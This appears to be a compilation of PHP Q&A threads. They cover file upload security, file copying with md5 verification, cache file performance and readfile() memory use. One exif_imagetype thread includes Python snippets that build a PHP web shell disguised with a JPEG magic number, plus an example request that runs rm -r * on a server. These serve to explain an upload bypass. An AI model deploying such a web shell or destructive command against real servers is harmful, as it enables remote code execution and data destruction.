I have the following PHP code:
// Check if the upload is set
if (!empty($_FILES['file']['name']) &&
    !empty($_FILES['file']['type']) &&
    !empty($_FILES['file']['size']))
{
$UploadIsSetted = true;
$UploadIsBad = false;
$UploadExtension = pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION);
// Check if the upload is good
require "../xdata/php/website_config/website.php";
$RandomFoo = rand(1000999999,9999999999);
if (($_FILES["file"]["size"] < ($MaxAvatarPictureSize*1000000)))
{
if ($_FILES["file"]["error"] > 0)
{
$UploadIsBad = true;
$hrefs->item(0)->setAttribute("Error","true");
$hrefs->item(0)->setAttribute("SomethingWrong","true");
}
else
{
move_uploaded_file($_FILES["file"]["tmp_name"],"../upload/tmp/".$RandomFoo.".file");
}
}
else
{
// The file is too big
$UploadIsBad = true;
$hrefs->item(0)->setAttribute("Error","true");
$hrefs->item(0)->setAttribute("UploadTooBig","true");
}
}
else
{
$UploadIsSetted = false;
}
$ZipFile = new ZipArchive;
$ZipFile->open('../upload/tmp/'.$LastFilename.'.zip',ZIPARCHIVE::CREATE);
$ZipFile->addFile('../upload/tmp/'.$RandomFoo.'.file',$RandomFoo.".".$UploadExtension);
$ZipFile->close();
Now my big concern is that users can upload anything, so how can I prevent:
uploading 2 GB / 3 GB files
flooding
uploading some kind of twisted exploit that would eventually alter my server security
buffer overflow
filenames that have arbitrary code injections
I mean, how secure is this script?
I'm running Windows for now; I will switch to Linux.
For your other questions:
flooding
That's the complex part. Let me google you some ideas:
Prevent PHP script from being flooded
Quick and easy flood protection? - use a nonce, tied to a session and a timestamp
Use a captcha, if it doesn't impair usability too much.
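The nonce/session idea can be sketched like this (a minimal sketch; `upload_allowed`, the injected `$session` array, and the 10-second window are my own choices, not from the question):

```php
<?php
// Minimal per-session flood-protection sketch: allow one upload per
// $minInterval seconds. $session stands in for $_SESSION so the logic
// is testable in isolation.
function upload_allowed(array &$session, int $now, int $minInterval = 10): bool
{
    $last = $session['last_upload'] ?? 0;
    if ($now - $last < $minInterval) {
        return false; // too soon after the previous upload: treat as flooding
    }
    $session['last_upload'] = $now;
    return true;
}
```

In a real script you would call `session_start()` first and pass `$_SESSION` and `time()`.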
uploading some kind of twisted exploit that would eventually alter my server security
Use a command-line virus scanner (f-prot or clamav) to scan uploaded files. You might use a naive regex scanner in PHP itself (probing for HTML-ish content in image files, for example), but that's not an actual security feature; don't reinvent the wheel.
buffer overflow
PHP in general is not susceptible to buffer overflows.
Okay, joking. But you can't do anything about it in userland anyway. Pushing strings around isn't much of a problem: it's pretty reliable and unexploitable in scripting languages, as long as you know what to escape in which context.
filenames that have arbitrary code injections
At the very least you should almost always use basename() to avoid path traversal exploits. If you want to keep user-specified filenames, a regex whitelist is in order; preg_replace('/[^\w\s.]/', '', $fn) as a crude example.
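Putting both suggestions together, a crude sanitizer might look like this (`sanitize_filename` is my own name; the character class is only a rough whitelist, extend it to taste):

```php
<?php
// Filename-sanitizing sketch: basename() against path traversal,
// then a crude character whitelist, then no leading dots.
function sanitize_filename(string $name): string
{
    $name = basename($name);                         // strip any directory components
    $name = preg_replace('/[^\w\s.-]/', '', $name);  // keep word chars, spaces, dots, dashes
    return ltrim($name, '.');                        // no hidden/dot-only names
}
```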
Your line if (($_FILES["file"]["size"] < ($MaxAvatarPictureSize*1000000))) already limits the size of acceptable files to $MaxAvatarPictureSize megabytes. However, $MaxAvatarPictureSize doesn't appear to be set in the code you provided. My guess is that it should be 1 or 2 at most.
Also not set is $LastFilename and probably some others too.
Also, place an if ($UploadIsBad === false) { /* do zipping */ } around the zipping part, to avoid zipping up files which are too large or otherwise invalid.
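That guard, combined with the zipping code from the question, could be sketched as a function (`zipUpload` is my own name; I pass the flags and paths in so the logic is testable, and use whatever zip path you choose in place of the undefined $LastFilename):

```php
<?php
// Zip the uploaded file only when every check passed (sketch).
// $isSet/$isBad correspond to $UploadIsSetted/$UploadIsBad in the question.
function zipUpload(bool $isSet, bool $isBad, string $src, string $zipPath, string $entryName): bool
{
    if (!$isSet || $isBad) {
        return false; // skip missing, oversized or otherwise invalid uploads
    }
    $zip = new ZipArchive;
    if ($zip->open($zipPath, ZipArchive::CREATE) !== true) {
        return false;
    }
    $zip->addFile($src, $entryName);
    return $zip->close();
}
```

This needs the zip extension, just like the original snippet.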
Related
I have an app that ingests photos from SD cards. After they are copied the cards will be reformatted and put back in cameras and more photos will be stored on them.
Currently, instead of using the PHP copy() function, I am doing the following (roughly):
$card = '/Volumes/SD_Card/DCIM/EOS/';
$files = scandir($card);
$target = '/Volumes/HARD_DRIVE/photos/';
foreach ($files as $file) {
    if (strtolower(pathinfo($file, PATHINFO_EXTENSION)) == 'jpg') {
        $img_data = file_get_contents($card . $file); // scandir() returns bare names, so prefix the path
        $orig_md5 = md5($img_data);
        $success = file_put_contents($target . $file, $img_data);
        unset($img_data);
        if ($success === false) { // file_put_contents() returns false on failure
            echo "an error occurred copying $file\n"; exit;
        } elseif ($orig_md5 != md5_file($target . $file)) {
            echo "an error occurred confirming data of $file\n"; exit;
        } else {
            echo "$file copied successfully.\n";
            unlink($card . $file); // remove the source once the copy is verified
        }
    }
}
I am currently doing it this way so I can compare the md5 hashes to make sure the copy is a bit-for-bit match of the original.
My questions are:
1) Would using php copy() be faster? I assume it would, because the target file doesn't have to be read into memory to check the md5 hash.
2) Does copy() do some sort of hash check as part of the function, to ensure the integrity of the copy, before returning TRUE/FALSE?
PHP's copy() function would not only be faster, it also copies using buffers, which avoids reading the whole source file into memory, a real problem for big files. The boolean it returns only indicates that the write succeeded; you can rely on that, but if you want to check the hash, use md5_file() instead of passing the contents to md5(), because it is optimized in the same memory-friendly way.
However, if you just have to rename the file, then rename() is far better: it is practically instant and reliable.
No, copy() doesn't perform any additional integrity checks, it assumes that the operating system's filesystem API is reliable.
You could use md5_file() on both the source and destination:
if (copy($source, $dest) && md5_file($dest) == md5_file($source)) {
echo "File copied successfully";
} else {
echo "Copy failed";
}
Note that your integrity checks do not actually check that the file was written to disk properly. Most operating systems use a unified buffer cache, so when you call md5_file() immediately after writing the file, it will get the file contents from the kernel buffers, not from the disk. In fact, it's possible that the target file hasn't even been written to disk yet; it's still sitting in kernel buffers waiting to be flushed. PHP doesn't have a function to call sync(2), but even if it did, it would still read from the buffer cache rather than re-reading from disk.
So you're basically at the mercy of the OS and hardware, which you must assume is reliable. Applications that need more reliability tests must perform direct device I/O rather than going through the filesystem.
I'm currently using this code in my software. Is it safe to check file extensions, or is there any way to bypass it?
$ext = explode('.', $_FILES['file']['name']);
$extension = strtolower(end($ext));
if (in_array($extension, array('jpg', 'jpeg', 'png', 'gif', 'pjpeg', 'x-png'))) {
    // extension looks acceptable
} else {
    echo 1;
    die();
}
Thank you..
are there any way to bypass it?
One way to bypass it is to simply rename the file.
After all, you currently only check parts of the file name.
To handle image uploads securely, OWASP suggests using a re-write approach.
In PHP you could do so by loading the image with gd or imagick and saving a new image based on the input. It may sound like a relatively useless step, but it's a pretty safe way to be sure you're actually dealing with an image.
Edit: See also this answer.
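A sketch of that re-encode step using gd (assumes the gd extension is loaded; JPEG only for brevity; `rewriteJpeg` is my own name):

```php
<?php
// Re-encode an uploaded JPEG with gd (sketch). Anything that is not a
// decodable JPEG fails, and the re-save discards metadata, where
// payloads often hide.
function rewriteJpeg(string $src, string $dest): bool
{
    $img = @imagecreatefromjpeg($src);
    if ($img === false) {
        return false; // not a real JPEG
    }
    $ok = imagejpeg($img, $dest, 90); // write a clean copy
    imagedestroy($img);
    return $ok;
}
```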
I personally would not recommend checking file extensions alone. A couple of points you need to consider based on your current approach:
Imagine I upload a file called mypicture.jpg.php: would your current if-statement logic catch that? Might be worth a test?
Following (1), if the answer was no, then the next question is: does your application check whether any PHP code is contained inside the JPG image, which could lead to various privilege escalations on the webserver?
Thus, following the previous answer from Stratadox I would also read this OWASP Unrestricted File Upload page. The OWASP link kindly provided by Stratadox focuses more on prevention techniques and the link I provided is more the attacking side. I think combined together this should help.
In summary, you could keep the current file extension checks but maybe add a few more advanced checks inside the if statement. A good suggestion already mentioned above is PHP's native image-handling functions/libraries, e.g. gd or imagick.
NOTE - always research any native PHP image-checking functions/libraries for security flaws (Google will help) and ensure you are configuring functions/settings correctly. This is a good practice to get into and will make you a more security-minded developer (and make some big $) :)
Hope this helps.
The best way is this:
<?php
// A function to return the extension, if you want to use it
function EXTENSION($sr) {
    $path_parts = pathinfo($sr);
    $exte = '.' . $path_parts['extension'];
    return $exte;
}
?>
<?php
// Or, the other way: test whether it really is a picture
$info = getimagesize($_FILES['file']['tmp_name']); // false if not an image
if ($info !== false && preg_match('#\.(jpe?g|png|gif)$#i', $_FILES['file']['name']) && $info[0] > 2) {
    // Do what you want
} else {
    echo 1;
    die();
}
?>
It's very safe like this, bro.
In my cache system, I want a check to be made when a new page is requested to see whether a file exists. If it doesn't, a copy is stored on the server; if it does exist, it must not be overwritten.
The problem I have is that I may be using functions designed to be slow.
This is part of my current implementation to save files:
if (!file_exists($filename)) {
    $h = fopen($filename, "wb");
    if ($h) {
        fwrite($h, $c);
        fclose($h);
    }
}
This is part of my implementation to load files:
if (($m = @filemtime($file)) !== false) {
    if ($m >= filemtime("sitemodification.file")) {
        $outp = file_get_contents($file);
        header("Content-length: " . strlen($outp), true);
        echo $outp;
        flush();
        exit();
    }
}
What I want to do is replace this with a better set of functions meant for performance while still achieving the same functionality. All caching files, including sitemodification.file, reside on a ramdisk. I added a flush before exit in the hope that the content will be output faster.
I can't use direct memory addressing at this time because the file sizes to be stored are all different.
Is there a set of functions I can use that executes the code I provided faster, by at least a few milliseconds, especially the file-loading code?
I'm trying to keep my time to first byte low.
First, prefer is_file() to file_exists(), and use file_put_contents():
if ( !is_file($filename) ) {
file_put_contents($filename,$c);
}
Then, use the proper function for this kind of work, readfile:
if (($m = @filemtime($file)) !== false && $m >= filemtime('sitemodification.file')) {
    header('Content-length: ' . filesize($file));
    readfile($file);
}
You should see a little improvement, but keep in mind that file access is slow, and you check for file access three times before sending any content.
I read that exif_imagetype() is a secure function for preventing the upload of PHP or other shell code in place of an image file. Recently I read another article saying that this function can be bypassed by some simple methods. So if someone knows the exact method to bypass it, can you share your answers?
I used the following code in my PHP script, so I want to know whether it is vulnerable or not, and the remedy for the same.
if (! exif_imagetype($_FILES['upload']['tmp_name']))
{
echo "File is not an image";
}
Based on Mr. #jake_the_snake's answer, I would also include a quick code sample in Python
>>> fh = open('shell.php', 'w')
>>> fh.write('\xFF\xD8\xFF\xE0' + '<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
It's a bit more complicated than just running exif_imagetype. That function simply checks the magic number at the beginning of the file, so more checks are needed. Without more knowledge of your software it's hard to make a judgement, but consider this example:
I construct "shell.php" with the JPEG magic number 0xFFD8FFE0 followed by the string <? passthru($_GET["cmd"]); ?>.
I upload it to your server. The magic number bypasses exif_imagetype, and the file is uploaded to www.your-domain.com/uploads/shell.php. I then navigate to www.your-domain.com/uploads/shell.php?cmd=rm+-r+*. The server finds the opening <? and starts interpreting PHP. Yay! I've deleted all your uploads, assuming you're running on a Linux webserver.
Even doing a deeper check on the validity of the image won't help, because I could include my malicious script in the metadata of the image. This is only prevented by using a whitelist of file extensions.
[TL;DR] It's not secure without more checking. You need to ensure an appropriate file name, use a whitelist of file extensions, limit file size, and perform standard security measures.
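Those layered checks could be sketched like this (`looksLikeImage` is my own name; assumes the exif extension is loaded; extend the whitelist as needed):

```php
<?php
// Layered upload check (sketch): extension whitelist first, then the
// magic-number check via exif_imagetype(). Neither alone is enough.
function looksLikeImage(string $tmpPath, string $originalName): bool
{
    $allowed = ['jpg', 'jpeg', 'png', 'gif'];
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return false; // rejects shell.php, image.jpg.php, ...
    }
    $type = @exif_imagetype($tmpPath);
    return in_array($type, [IMAGETYPE_JPEG, IMAGETYPE_PNG, IMAGETYPE_GIF], true);
}
```

On top of this you would still limit the file size and store uploads outside the web root (or with a safe, server-chosen name).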
#solidak's answer is for Python 2, which is deprecated now, so here is a Python 3 rewrite:
>>> fh = open('shell.php', 'wb')
>>> fh.write(b'\xFF\xD8\xFF\xE0' + b'<? passthru($_GET["cmd"]); ?>')
>>> fh.close()
For security I use:
$extension = pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION);
if(!in_array(strtolower($extension), array('jpg', 'jpeg', 'png', 'gif')))
{
echo "File is not an image";
}
I've seen many questions about how to efficiently use PHP to download files rather than allowing direct HTTP requests (to keep files secure, to track downloads, etc.).
The answer is almost always PHP readfile().
Downloading large files reliably in PHP
How to force download of big files without using too much memory?
Best way to transparently log downloads?
BUT, although it works great during testing with huge files, on a live site with hundreds of users the downloads start to hang and PHP memory limits are exhausted.
So what is it about how readfile() works that causes memory to blow up so badly when traffic is high? I thought it was supposed to bypass heavy use of PHP memory by writing directly to the output buffer?
EDIT: (To clarify, I'm looking for a "why", not a "what can I do". I think Apache's mod_xsendfile is the best way to circumvent the problem.)
Description
int readfile ( string $filename [, bool $use_include_path = false [, resource $context ]] )
Reads a file and writes it to the output buffer.
PHP has to read the file and write it to the output buffer.
So, for a 300 MB file, no matter which implementation you write (many small segments or one big chunk), PHP eventually has to read through all 300 MB of the file.
If multiple users have to download files at the same time, there will be a problem.
(On a shared server, hosting providers limit the memory given to each hosting user. With such limited memory, relying on the buffer is not going to be a good idea.)
I think using a direct link to download the file is a much better approach for big files.
If you have output buffering on, then use ob_end_flush() right before the call to readfile():
header(...);
ob_end_flush();
@readfile($file);
As mentioned in "Allowed memory .. exhausted" when using readfile, the following block of code at the top of the PHP file did the trick for me.
It checks whether PHP output buffering is active and, if so, turns it off.
if (ob_get_level()) {
ob_end_clean();
}
You might want to turn off output buffering altogether for that particular location, using PHP's output_buffering configuration directive.
Apache example:
<Directory "/your/downloadable/files">
...
php_admin_value output_buffering "0"
...
</Directory>
"Off" as the value seems to work as well, while it really should throw an error. At least according to how other types are converted to booleans in PHP. *shrugs*
I came up with this idea in the past (as part of my library) to avoid high memory usage:
function suTunnelStream( $sUrl, $sMimeType, $sCharType = null )
{
    $f = @fopen($sUrl, 'rb');
    if ($f === false) {
        return false;
    }
    $b = false;
    $u = true;
    while ($u !== false && !feof($f)) {
        $u = @fread($f, 1024);
        if ($u !== false) {
            if (!$b) {
                $b = true;
                suClearOutputBuffers();
                suCachedHeader(0, $sMimeType, $sCharType, null,
                    !suIsValidString($sCharType) ? ('content-disposition: attachment; filename="' . suUniqueId($sUrl) . '"') : null);
            }
            echo $u;
        }
    }
    @fclose($f);
    return ($b && $u !== false);
}
Maybe this can give you some inspiration.
Well, it is a memory-intensive function. I would send users to a static server that has a specific rule set in place to control downloads, instead of using readfile().
If that's not an option, add more RAM to satisfy the load, or introduce a queuing system that gracefully controls server usage.